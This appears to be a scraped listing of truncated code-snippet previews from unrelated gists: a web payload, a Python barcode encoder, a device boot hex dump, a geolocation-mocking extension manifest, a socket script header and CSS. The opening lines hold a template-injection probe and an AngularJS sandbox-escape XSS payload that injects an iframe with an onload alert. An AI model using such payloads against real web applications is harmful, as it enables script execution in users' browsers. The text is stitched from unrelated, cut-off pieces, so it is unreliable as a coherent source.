{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
CODE = { "10" : u"▌", "01": u"▐", "11": u"█", "00": u" "} | |
CHARS = {'0':'1010001110111010', | |
'1':'1110100010101110', | |
'2':'1011100010101110', | |
'3':'1110111000101010', | |
'4':'1010001110101110', | |
'5':'1110100011101010', |
Built on Feb 29 2016 15:11:54 | |
Config lost - RTC invalid - external reset/power failure | |
04003660: 20 f8 5e a | |
b 21 55 ff ff 39 35 30 45 | |
04003680: 45 41 41 44 37 32 42 30 36 35 46 36 43 39 34 36 36 43 37 30 43 44 41 3 | |
9 42 39 37 41 93 2c 80 00 | |
040036a0: 01 02 ff ff | |
Flojo App version 39, WFW version 2c0200 | |
Boot time 0 |
{ | |
"manifest_version": 2, | |
"name": "Mocklocation", | |
"description": "Override navigator.geolocation with Mocklocation", | |
"version": "0.1", | |
"permissions": [ | |
"http://*/*", | |
"https://*/*" | |
], |
#!/usr/bin/env python | |
import sys | |
import socket | |
import select | |
import signal | |
from Debug import dinit, dprint | |
.fc { | |
direction: ltr; | |
text-align: left; } | |
.fc table { | |
border-collapse: collapse; | |
border-spacing: 0; } | |
.fc .btn { | |
line-height: 1.2em; } | |
html .fc { |